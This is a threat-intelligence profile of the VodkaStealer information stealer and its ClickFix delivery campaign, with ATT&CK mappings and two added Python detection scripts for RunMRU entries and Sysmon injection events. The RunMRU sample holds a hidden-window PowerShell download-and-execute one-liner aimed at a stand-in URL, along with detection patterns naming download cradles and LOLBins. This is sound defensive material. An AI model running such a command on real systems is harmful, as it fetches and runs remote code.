Mallory
Malware

VodkaStealer

VodkaStealer is a custom C++ information stealer observed as a payload in a large ClickFix campaign that used compromised legitimate WordPress sites to target primarily Windows users. In the reported activity, attackers injected malicious JavaScript into the WordPress sites and displayed fake Cloudflare human-verification (CAPTCHA) prompts that instructed victims to paste a command into the Windows Run dialog, starting a multi-stage, largely in-memory infection chain.

Rapid7 reported that the broader operation had been active in this form since December 2025, with some supporting infrastructure dating to July/August 2025, and identified more than 250 compromised websites across at least 12 countries. VodkaStealer was delivered alongside other payloads, including Vidar Stealer, Impure Stealer and the DoubleDonut loader; Rapid7 described VodkaStealer as the latest payload observed at the end of the DoubleDonut chain. The family is described as capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

The reporting ties VodkaStealer with high confidence to financially motivated malware distribution using ClickFix social-engineering lures on compromised WordPress infrastructure. No attribution to a specific threat actor is given.


MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic (T1055 Process Injection is listed under both tactics it maps to, so 14 entries appear below).

Initial Access

1 technique
T1189 Drive-by Compromise (evidence: 4)

Highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge.

Execution

2 techniques
T1059 Command and Scripting Interpreter (evidence: 1)

Visitors are instructed to complete the verification by copying and pasting a command into the Windows Run dialog box.

T1204 User Execution (evidence: 3)

Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands.
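The Run-dialog step described above leaves a host artifact worth hunting: Windows records what was typed into the Run dialog under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per command with a trailing "\1", ordered by the MRUList value (most recent first). The following is an added example, not code from the page or from Rapid7, that decodes an exported RunMRU key and flags entries that combine several traits of a ClickFix one-liner (download cradle, in-memory execution, hidden window, encoded command, LOLBin, remote URL). The sample key, the trait patterns and the two-trait threshold are assumptions for illustration; the URL is deliberately non-resolvable.

```python
import re

# Constructed sample of an exported RunMRU key (not data from the page or the report).
# Each lettered value holds the typed command plus "\1"; MRUList orders the letters
# most-recent-first, so "bca" means entry b was typed last.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "powershell -w hidden -c \"iex (iwr 'http://example.invalid/v.ps1' -UseBasicParsing)\"\\1",
    "c": "calc\\1",
    "MRUList": "bca",
}

# One pattern per trait of a ClickFix-style command. Assumed for illustration; tune
# to your environment (e.g. add the cradle names your users legitimately type).
SUSPICIOUS_TRAITS = [
    (r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget)\b", "download cradle"),
    (r"\b(iex|invoke-expression)\b", "in-memory execution"),
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(mshta|certutil|bitsadmin)\b", "LOLBin"),
    (r"https?://", "remote URL"),
]
COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in SUSPICIOUS_TRAITS]


def ordered_entries(runmru):
    """Return (entry_name, command) pairs newest first, with the trailing \\1 removed."""
    out = []
    for name in runmru.get("MRUList", ""):
        raw = runmru.get(name)
        if raw is None:
            continue  # MRUList can reference a value that was cleared
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        out.append((name, cmd))
    return out


def traits(cmd):
    """Labels of every suspicious trait present in one Run-dialog command."""
    return [label for rx, label in COMPILED if rx.search(cmd)]


def hunt(runmru, min_traits=2):
    """Flag commands that combine at least min_traits suspicious traits.

    Requiring two traits keeps a lone 'curl' or a pasted URL from firing while still
    catching the download-and-execute shape that ClickFix lures rely on.
    """
    hits = []
    for position, (name, cmd) in enumerate(ordered_entries(runmru)):
        found = traits(cmd)
        if len(found) >= min_traits:
            hits.append({"position": position, "name": name, "command": cmd, "traits": found})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_RUNMRU):
        print(f"[{hit['position']}] {hit['name']}: {hit['command']}")
        print("    traits: " + ", ".join(hit["traits"]))
```

On a live host the same dictionary can be built with the standard winreg module by enumerating the RunMRU key under HKEY_CURRENT_USER; the key is per-user and persists across reboots, so it is useful in forensics on an already-rebooted machine. The pasted command also tends to appear in PowerShell script block logging (event 4104) and in Sysmon process-creation events where explorer.exe is the parent of powershell.exe, which the same trait patterns can be applied to.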

Privilege Escalation

1 technique
T1055 Process Injection (evidence: 1)

"...execute it utilizing the VirtualAlloc and CreateThread Windows APIs..." and "...injected into a native svchost.exe process..."; "OpenProcess... VirtualAllocEx, WriteProcessMemory and CreateRemoteThread"

Defense Evasion

1 technique
T1055 Process Injection (evidence: 1)

"...execute it utilizing the VirtualAlloc and CreateThread Windows APIs..." and "...injected into a native svchost.exe process..."; "OpenProcess... VirtualAllocEx, WriteProcessMemory and CreateRemoteThread"

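The API sequence quoted for T1055 under both tactics above (OpenProcess, VirtualAllocEx, WriteProcessMemory, CreateRemoteThread into svchost.exe) maps onto three Sysmon event types: process creation (event 1), ProcessAccess (event 10, which records the access mask OpenProcess was granted) and CreateRemoteThread (event 8). The following is an added example, not code from the page or from Rapid7, that triages a handful of constructed Sysmon-shaped events for that pattern: a svchost.exe not started by services.exe, a handle to svchost.exe carrying the write-and-create-thread rights the sequence needs, and a remote thread in svchost.exe whose start address is not backed by a loaded module. The events, the allowlists and the field names are assumptions for illustration; the access-right constants are the documented Win32 values.

```python
# Constructed, Sysmon-shaped events; not telemetry from the page or the report.
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SVCHOST = r"C:\Windows\System32\svchost.exe"

SAMPLE_EVENTS = [
    # event 1: svchost.exe launched by PowerShell rather than the service control manager
    {"EventID": 1, "Image": SVCHOST, "ParentImage": POWERSHELL, "CommandLine": "svchost.exe"},
    # event 1: a normal service host
    {"EventID": 1, "Image": SVCHOST, "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs -p"},
    # event 10: OpenProcess with PROCESS_ALL_ACCESS on svchost.exe
    {"EventID": 10, "SourceImage": POWERSHELL, "TargetImage": SVCHOST, "GrantedAccess": "0x1FFFFF"},
    # event 10: query-only handle, no write or thread rights
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe", "TargetImage": SVCHOST,
     "GrantedAccess": "0x1400"},
    # event 8: remote thread whose start address is in no loaded module (empty StartModule)
    {"EventID": 8, "SourceImage": POWERSHELL, "TargetImage": SVCHOST,
     "StartAddress": "0x000001E2A3B40000", "StartModule": ""},
]

# Rights OpenProcess must grant for VirtualAllocEx / WriteProcessMemory / CreateRemoteThread.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_RIGHTS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE  # 0x2A

# Assumed allowlists for illustration; derive real ones from baseline telemetry.
LEGIT_SVCHOST_PARENTS = {"services.exe"}
LEGIT_REMOTE_THREAD_SOURCES = {"csrss.exe"}


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def has_inject_rights(granted_access):
    """True if every right in INJECT_RIGHTS is set in the hex GrantedAccess mask."""
    return int(granted_access, 16) & INJECT_RIGHTS == INJECT_RIGHTS


def triage(events):
    """Return one alert per event that matches an injection-into-svchost signal."""
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:
            if (basename(ev["Image"]) == "svchost.exe"
                    and basename(ev["ParentImage"]) not in LEGIT_SVCHOST_PARENTS):
                alerts.append({"EventID": 1,
                               "reason": "svchost.exe spawned by " + basename(ev["ParentImage"])})
        elif eid == 10:
            if basename(ev["TargetImage"]) == "svchost.exe" and has_inject_rights(ev["GrantedAccess"]):
                alerts.append({"EventID": 10,
                               "reason": f"{basename(ev['SourceImage'])} opened svchost.exe with "
                                         f"{ev['GrantedAccess']} (write and create-thread rights)"})
        elif eid == 8:
            if (basename(ev["TargetImage"]) == "svchost.exe"
                    and basename(ev["SourceImage"]) not in LEGIT_REMOTE_THREAD_SOURCES):
                reason = f"remote thread in svchost.exe from {basename(ev['SourceImage'])}"
                if ev.get("StartModule", "") == "":
                    reason += ", start address not in any loaded module"
                alerts.append({"EventID": 8, "reason": reason})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"event {alert['EventID']}: {alert['reason']}")
```

The mask check is the part worth keeping even if the rest is replaced by a SIEM rule: a handle that lacks any one of 0x2, 0x8 or 0x20 cannot complete the quoted sequence, so matching on the full 0x2A subset rather than on specific observed values (0x1FFFFF, 0x1F3FFF and so on) keeps the detection stable when the loader requests a narrower access mask. Because the report describes the loader starting its own "native svchost.exe", the orphaned-svchost check (event 1) is the earliest signal in the chain.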
Credential Access

4 techniques
T1539 Steal Web Session Cookie (evidence: 2)

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555 Credentials from Password Stores (evidence: 1)

The payloads delivered include Vidar Stealer, Impure Stealer, VodkaStealer and the DoubleDonut loader - all capable of harvesting browser credentials, authentication cookies, cryptocurrency wallet data and other sensitive information from infected devices.

T1555.003 Credentials from Web Browsers (evidence: 1)

"...ultimately steals and exfiltrates credentials and digital wallets..."; "...targeting Google Chrome, Microsoft Edge, Brave..."

T1649 Steal or Forge Authentication Certificates (evidence: 1)

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

The quoted evidence describes keychain databases and wallet seed phrases rather than authentication certificates, so this mapping is only weakly supported by the material on this page; T1555 and T1005 cover the quoted behaviour more directly.

Collection

1 technique
T1005 Data from Local System (evidence: 1)

The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.

Command and Control

3 techniques
T1071.001 Web Protocols (evidence: 1)

"Invoke-WebRequest" to retrieve payloads; "...fetch a script..."; "...download a shellcode blob..."

T1104 Multi-Stage Channels (evidence: 1)

"...multi-stage malware chain..."; "...Donut loader is used twice in sequence..."

T1573.001 Symmetric Cryptography (evidence: 1)

"...AES-256-CBC with a server-provided key for encryption of C2 communication..."

Exfiltration

1 technique
T1041 Exfiltration Over C2 Channel (evidence: 1)

"...steals and exfiltrates credentials and digital wallets..." and ATT&CK table listing "T1041 Exfiltration Over C2 Channel"

INDICATORS OF COMPROMISE

IOCs tracked for this family

55 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

Network
17 tracked

IPs, domains, and DNS infrastructure linked to this family.

Other
38 tracked

Other indicator types observed in public reporting.

Type     Value            Latest sighting
domain   ●●●●●●●●●●●●     21 days ago
ip.v4    ●●●●●●●●●●●●     3 months ago
domain   ●●●●●●●●●●●●     4 months ago
domain   ●●●●●●●●●●●●     4 months ago
domain   ●●●●●●●●●●●●     4 months ago
domain   ●●●●●●●●●●●●     4 months ago